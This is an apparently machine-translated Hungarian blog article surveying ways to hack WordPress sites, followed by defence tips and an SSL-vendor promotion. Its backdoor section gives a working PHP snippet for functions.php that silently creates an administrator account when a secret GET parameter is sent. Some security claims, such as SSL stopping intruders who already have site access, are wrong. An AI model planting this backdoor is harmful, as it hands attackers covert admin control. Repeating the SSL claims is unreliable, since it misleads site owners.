Hogyan hackeljük meg a WordPress-t?

Intro

Mielőtt elkezdenénk ezt a cikket, szeretnénk, ha tudná, hogy a hackelés illegális, és mi nem ösztönözzük vagy bátorítjuk a rosszindulatú tevékenységeket. Ez a cikk kizárólag arra szolgál, hogy ismereteket szerezzünk arról, hogyan működnek a csalók, és hogy a webhely biztonságának változatos módszerei elengedhetetlenek ahhoz, hogy távol tartsuk őket. Beszéljük meg!

• Hogyan hackelik meg a csalók a WordPress-t?
• Hogyan védd meg WP oldaladat a csalóktól?

Szóval, minden további nélkül kezdjük a témát.

Hogyan Hack WordPress weboldal Online?

(Forrás: wpsecurityninja.com)

A WPScan használata:

AWPScan egy WP biztonsági szkenner, amely segít a webhelytulajdonosoknak ellenőrizni a WordPress webhelyük sebezhetőségét, de ezt a szkennert a hackerek is használják a webhelyek feltörésére irányuló indítékaik teljesítéséhez.

A WPScan lehetővé teszi a webhelyek tulajdonosai és rendszergazdái számára, hogy megadják a WP felhasználói fiókokat és a nyers erővel használt jelszavakat, és a WP fiókokhoz való jogosulatlan hozzáférés megszerzésének első lépése.

(Brute force felhasználónév és jelszó a WPScan segítségével. Forrás: Medium)

MIM-támadások:

A Man-in-middle (MIM) támadások könnyen végrehajthatók hasonló LAN-okat használó felhasználók esetében. A nem titkosított felhasználói bejelentkezések könnyű célpontot jelentenek, mivel minden részlet látható egyszerű szövegben.

Az ilyen típusú támadások végrehajtásában részt vevő szoftverek képesek kiszúrni a kompromittált témákat, bővítményeket, és képesek a felhasználók felsorolására.

(Forrás: Medium)

SQL Injections:

Az SQL-injekciós támadások a legjelentősebb támadások, amelyeket a weboldalakba való behatoláshoz használnak. Ezek a támadások a weboldal backend átjáróit célozzák, és lehetővé teszik a hackerek számára, hogy a kompromittált parancsok végrehajtásával behatoljanak ezekbe.

(Forrás: secure.wphackedhelp.com)

Ezek a behatolások lehetővé teszik a hackerek számára az adatbázisok és parancsok módosítását, valamint a webhelyinformációk törlését vagy ellopását is.

Mivel ezek az SQL-támadások kiszúrják a sebezhető és javítatlan oldalakat, megkönnyítik és sikeressé teszik a hackerfeladatot.

A My SQL/cPanel használata:

Ennél a módszernél a hackerek egy hamis fiókot hoznak létre, vagy módosítják a WP oldal jelenlegi felhasználójának jelszavát. A hackerek a cPanelen keresztül próbálnak behatolni a PhpMyAdmin megnyitásával. A _users végződésű táblázatot keresik, és megtalálják a felhasználót, akit módosítani szeretnének.

Ez lehetővé teszi számukra, hogy megváltoztassák annak a felhasználónak a hitelesítő adatait, akit meg akarnak hackelni. Lenyomozzák a felhasználót, és megváltoztatják a felhasználó jelszavát (a user_pass mezőből) az online MD5-generátor megnyitásával, és kicserélik azt a kívánt jelszóra, majd később a # gombra kattintanak.

(A felhasználónevek, a felhasználók kódolt jelszavai, e-mail azonosítóik stb. mind a wp_users adatbázis táblában vannak tárolva. Forrás: firstsiteguide.com)

A felhasználónevek, a felhasználók kódolt jelszavai, e-mail azonosítóik stb. mind a wp_users adatbázis táblában vannak tárolva.

Functions.php szerkesztése:

A hackerek a Functions.php fájl módosításához is hozzáférnek a cPanelhez. A Fájlkezelő feloldásával megkeresik az aktív téma mappáját. A public_html/wp_content/themes mappából követik a témát, és a functions.php-t szerkesztik a kompromittált kódjuk elhelyezésével. A hackelés már folyamatban van, mert a hackerek új fiókot hoztak létre. Ha ezzel végeztek, törlik a kompromittált kódot.

Új felhasználói fiók létrehozása FTP-n keresztül:

Általában az FTP-fiókok segítenek a webhelytulajdonosoknak létrehozni egy olyan könyvtárat a webhelyükön belül, amely lehetővé teszi, hogy bizonyos felhasználók a bejelentkezési adataikkal feltöltsék/letöltsék a fájljaikat.

Ezek a fájlok az interneten is megtekinthetők.

FTP-fiók létrehozása a webhelyen:

• Adja meg a kívánt adatokat
• Adja meg az új FTP-felhasználó felhasználónevét
• Adja meg a jelszót az FTP-n keresztül történő hozzáféréshez szükséges fiók kiosztásához.
• Adja meg a könyvtár nevét az FTP-n keresztül történő hozzáféréshez.
• Írja be a kívánt MB helyet, amelyet a mappának kíván adni.
• Később nyomja meg a "Create" gombot az új fiók létrehozásához.

Az FTP-n keresztül történő hozzáféréshez az új felhasználónak be kell töltenie az alábbi adatokat.

Cím / Host Name / Address: yourdomain.com vagy ftp.yourdomain.com Felhasználó / User: user@yourdomain.com Jelszó: Az FTP-fiókhoz rendelt jelszó.

Port: 21Nevezze meg a fájlok feltöltésére/letöltésére szolgáló mappát.

Az új felhasználónak olvasási és írási jogosultságai lesznek mind a kiválasztott könyvtárban, mind az abban található összes alkönyvtárban. Például, ha létrehozza az ügyfél felhasználót, és hozzáférést ad neki a / home / user / public_html könyvtárhoz.

Behatolás a hátsó ajtón keresztül:

A webhelyre való behatolás rosszindulatú módja a hátsó ajtón keresztül történik. Legyen szó akár egy csalóról, aki be akar férni a webhelyére, akár az áldozat felhasználóról, aki vissza akarja szerezni a hozzáférést a webhelyéhez a backdoor behatoláson keresztül, mindkettőjüknek követniük kell az alábbi lépéseket.

Azokban az esetekben, amikor egy új felhasználói fiókot hoznak létre FTP-n keresztül, vagy jelszó-visszaállítás történik, de ez nem adja meg a kívánt eredményt, a felhasználó hátsó ajtón keresztül akarja feltörni a webhelyét, és visszaszerezni az adminisztrátori hozzáférését.

Lépések a Backdoor létrehozásához:

• Nyissa meg a functions.php fájlt, és illessze be az alábbi kódot.

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• Később mentse el a változtatásokat.

Crypto Jacking & Cryptocurrency Mining:

A kriptovaluták népszerűsége olyan új kiberfenyegetéseknek adott teret, mint a kriptodézsma, amelyet kriptovaluta-bányászati kártevőnek is neveznek.

A számítógépnek a felhasználó akarata és tudatossága ellenére történő elkobzását kriptodézsmának nevezik. A crypto-jacking malware esetében a csalók a rendszereket és hálózatokat veszélyeztető szoftveren keresztül szállított rosszindulatú malware-rel fertőzik meg a felhasználó számítógépét.

Adathalászat:

Az adathalászat olyan módszer, amelynek során a csalók a felhasználók érzékeny adatait (bejelentkezési adatok, szociális számlaszám, PIN-kód, hitelkártyaadatok stb.) úgy csalják ki, hogy jogi személynek adják ki magukat. Céljuk eléréséhez általában e-maileket használnak.

Példa: Az adathalász e-mailben rossz linket is elhelyezhet, és a felhasználókat valamilyen csalárd webhelyre irányíthatja, ahová rosszindulatú szoftvereket juttathat el.

Malware:

AWordPress biztonsági statisztikák szerint 4000 WP weboldal fertőződött meg rosszindulatú szoftverektől a hamis SEO pluginek miatt.

A csalóknak nincs szükségük forrásra a rosszindulatú programok terjesztéséhez. A SEO pluginek, a WP témák és sok más, az oldalon jelenlévő tényező motiválta a hackereket, hogy a közelmúltban megjelent WP-VCD malware-t használják.

Még az adathalász e-mailek is átjárók a rosszindulatú programok terjesztéséhez.

A hackerek mottója itt is ugyanaz, azaz a felhasználók érzékeny adatainak megszerzése a rendszerekbe való behatolással és az információk ellopásával.

WordPress Ransomware:

A WP ransomware esetében a hackerek rosszindulatú szoftverekkel blokkolják a felhasználók hozzáférését a rendszerekhez és hálózatokhoz. Ugyanezt a felhasználó a hacker által követelt váltságdíj megfizetésével tudja visszaállítani.

Példa: A Petya-támadás, amelynek során a hacker titkosítja a fájlokat és adatokat, és váltságdíjat követel a visszafejtő kulcs ellenében.

Cross-Site Scripting (XSS) támadás:

Az XSS-támadásokat a hackerek úgy hajtják végre, hogy rosszindulatú tartalmat juttatnak be a weboldalba, kihasználva ezzel a böngészőt. Ez a támadás lehetővé teszi a hacker számára, hogy adatokat lopjon a cookie-kból, módosítsa a webhely tartalmát, és elfoglalja a webhelyet érzékeny adatok megszerzése céljából.

Kattintáslopás:

A clickjacking során a hacker rosszindulatú kísérletet tesz egy gomb/link kompromittálására, és arra ösztönzi a felhasználót, hogy kattintson a kompromittált objektumra. Ez lehetővé teszi a hacker számára, hogy rosszindulatú parancsokat hajtson végre a felhasználó számára érzékeny adatokhoz való hozzáférés érdekében.

Spoofing:

A hamisítás olyan támadás, amelyben a személy megbízható személyazonosságnak álcázza magát, hogy illegális előnyökhöz jusson a felhasználóval szemben, és rávegye őt bizalmas információinak megadására.

Mindezen hackertámadások megelőzése érdekében speciális biztonsági intézkedéseket kell hozni a WP weboldalának védelme érdekében.

Hogyan védjük meg a WordPress weboldalt a hackertől?

(Forrás: envisagedigital.co.uk)

A fenti statisztikák elégségesek ahhoz, hogy jelezzék a WordPress népszerűségét. Ez a népszerűség teszi ezt a CMS-platformot kívánatosabbá a hackerek körében, akik változatos hackelési módszerekkel próbálkoznak, hogy hozzáférjenek a WP-weboldalakhoz és azok adataihoz.

Ezért fontos tudni, hogyan lehet megakadályozni, hogy a hackerek hozzáférjenek a WP webhelyéhez.

Biztosítsa WP webhelyét SSL-tanúsítvánnyal:

Amikor bármilyen adat betöltődik a webhelyre, az mindig egyszerű szövegben van, ami mindenki számára könnyen látható, beleértve a hackereket is. Ez kockázatos lehet, mivel a hackerek visszaélhetnek a webhely adataival.

Az SSL (Secure Socket Layers) tanúsítványok azok a digitális tanúsítványok, amelyek segítenek a WP webhelyének 256 bites titkosítási biztonsággal történő védelmében, így a webhely adatait kódolt formátumba alakítják át.

A hackerek nem tudják elolvasni a kódokat, noha hozzáférést szereztek az Ön webhelyéhez, és ezért kénytelenek elhagyni az ilyen webhelyeket.

(Forrás: clickssl.net)

Válassza ki a kívánt márkájú SSL tanúsítványt (Comodo, Thawte, RapidSSL, stb.) és telepítse azt a WP oldalára. Az SSL-tanúsítvány típusa esetén meg kell értenie a domaineket és az aldomaineket. Például, ha a WP webhelye aldomainekkel rendelkezik, akkor egyetlen olcsó Wildcard tanúsítvány, amely mindössze 45 $/évbe kerül, körülbelül 45 $/év, biztosíthatja az egész digitális vállalkozását.

Gyors kiállítás, 2048 bites titkosítás, SEO-növelés, webhely-megbízhatósági pecsét, 99%-os böngésző/mobil kompatibilitás, visszatérítési politika és garancia - ez csak néhány a Wildcard SSL tanúsítványok telepítésének jellemzői és előnyei közül.

Az SSL-termékek változatos márkái és lehetőségei, a költségvetés-barát árak és a kiváló ügyfélszolgálat csak néhány előnye annak, hogy a ClickSSL üzletet választja WP webhelyének biztosításához.

Frissítse az alkalmazottakat:

Az emberi hibák katasztrofálisak lehetnek, ezért mindig gondoskodjon arról, hogy alkalmazottai naprakészek legyenek a legújabb kiberfenyegetésekkel kapcsolatban, hogy elkerüljék a sebezhetőségüket.

Ha az Ön munkatársai már a kezdeti szakaszban nyomon tudják követni a feltört webhely gyanús jeleit, tájékoztathatják az érintetteket, és megakadályozhatják, hogy webhelye és vállalkozása további károkat szenvedjen.

Kétfaktoros hitelesítés (2FA) használata:

A 2FA bevezetése az oldalra történő bejelentkezés során a legfontosabb módja a nyers erővel végrehajtott támadások kivédésének. Amellett, hogy egy újabb biztonsági réteget adnak hozzá, a webhely és a felhasználó adatait is védik.

Ennek oka, hogy ha az egyik biztonsági réteg sérül, a csalónak a 2. rétegbe kell behatolnia, hogy hozzáférjen a weboldalhoz.

Ez egy nehéz döntés, és ezért az esetek többségében a csalók végül más, rosszul védett oldalakra térnek át.

Tipp: A WP 2FA egy ingyenes WP bővítmény, amely egy további biztonsági réteget ad a WP webhelyének.

Rendszeresen ellenőrizze a rendszergazdai felhasználókat:

Ez fontos a WP webhely biztonsága szempontjából. Győződjön meg róla, hogy rendszeresen auditálja admin felhasználóit, és ellenőrizze a hozzáféréseiket.

A biztonsági hiányosságok megelőzése érdekében gondoskodjon arról is, hogy a felhasználók és az alkalmazottak a feladataiknak megfelelően korlátozott hozzáféréssel rendelkezzenek.

Rendszeresen frissítse a WordPress magját:

Nem tudsz a WP Core-ról?

Hadd tájékoztassalak röviden, hogy a WP Core tartalmazza az összes alapvető alapfájlt, amely a WP működéséhez szükséges.

A WordPress.org-ról letöltött WP zip fájlban található fájlok listája

(Forrás: ithemes.com)

Ezeket az alapfájlokat rendszeresen frissíteni kell a biztonsági frissítések kiadása után, hogy az összes biztonsági rést befoltozzák.

WP témák és bővítmények letöltése megbízható forrásokból:

Ez kulcsfontosságú, mert a bővítmények fenyegetőek lehetnek, ha nem frissítik őket, vagy nem megbízható forrásból telepítik őket. Ingyenes/fizetett bővítmények használata esetén mindig ellenőrizze az alábbiakban felsorolt tényezőket, mint például:

• Felhasználói értékelések és vélemények
• Felhasználóbarátság
• Kompatibilitás
• Biztonság
• Megbízhatóság

(Forrás: torquemag.io)

Ugyanez a szabály vonatkozik a WP témák telepítésére is.

WP témák és bővítmények rendszeres frissítése:

Az elavult vagy lejárt WP témák és bővítmények mindig veszélyt jelentenek a WP webhelyére, mivel elveszítik a biztonsági szabványokat. Annak érdekében, hogy a hackerek ne használhassák az ilyen átjárókat rosszindulatú programok terjesztésére, hogy hozzáférjenek a webhelyhez, gondoskodjon a WP webhelyén használt témák és bővítmények rendszeres frissítéséről.

Ez segít a plugin megfelelő működésében és a WP legújabb verzióival való szinkronizálásban.

Tipp: A bővítmények oldalon megtekintheti az összes telepített bővítményt, és minden egyes bővítmény mellett egy linket, amely az "Automatikus frissítések engedélyezése" feliratot tartalmazza. Kapcsolja be az automatikus frissítésekhez.

Módosítsa az alapértelmezett adminisztrátornevet:

A hackerek túl okosak, és az alapértelmezett admin név használatával könnyen behatolhatnak a WP oldaladra. Mindig előnyös az alapértelmezett admin felhasználónév módosítása, hogy megakadályozza a hackerek brute-force támadások végrehajtását a webhelyedhez való jogosulatlan hozzáférés megszerzéséhez.

Korlátozott hozzáférés biztosítása:

Soha ne adjon többet a szükségesnél, és ugyanez a szabály vonatkozik a felhasználók és az alkalmazottak webhely-hozzáférésének megadására is.

A hozzáférés-szabályozás a webhely- és adatbiztonság legfontosabb szabálya, mivel ez határozza meg, hogy ki férhet hozzá a webhelyhez és ki nem. A webhely biztonsága érdekében blokkolja a WP admin és más kritikus kódok és adatok összes bejáratát.

A korlátozott hozzáférés nem csak a termelékenységet javítja, hanem a rosszindulatú bejegyzésektől is védi webhelyét.

WordPress frissítés:

Ha a WordPress nincs frissítve, webhelyét a hackerek behatolásának veszélye fenyegeti.

A WordPress a piaci részesedés 37%-át uralja, és rendszeresen frissítéseket ad ki a biztonsági rések és hibák kijavítására. Ezek a frissítések új funkciókat és a meglévők javítását is tartalmazzák, amelyek hasznosak a webhely teljesítményének fokozásához.

(Forrás: wpbeginner.com)

Tartsa naprakészen WP webhelyét a robusztus biztonság érdekében.

Befejezés:

Használjon erős és összetett jelszavakat, és tartsa WP webhelyét, valamint a bővítményeket és témákat frissítve, hogy kijavítsa az összes biztonsági hiányosságot. Szánjon időt alkalmazottai oktatására, mivel ez mindig segít a katasztrófák megelőzésében.

Soha ne lazítson a biztonságon, és mindig biztosítsa, hogy a legjobb és megbízható biztonsági bővítményeket használja, hogy WP webhelyét biztonságban tartsa a kíváncsi szemektől. Ezen kívül, védje webhelyét SSL-lel, hogy növelje az ügyfelek bizalmát, az üzletet és a SEO-t.

Most, hogy már tisztában vagy azzal, hogyan működnek a hackerek, reméljük, hogy ez a cikk segít abban, hogy megakadályozd a hackerek behatolását a webhelyedre, és biztonságosan kezeld a WP webhelyedet.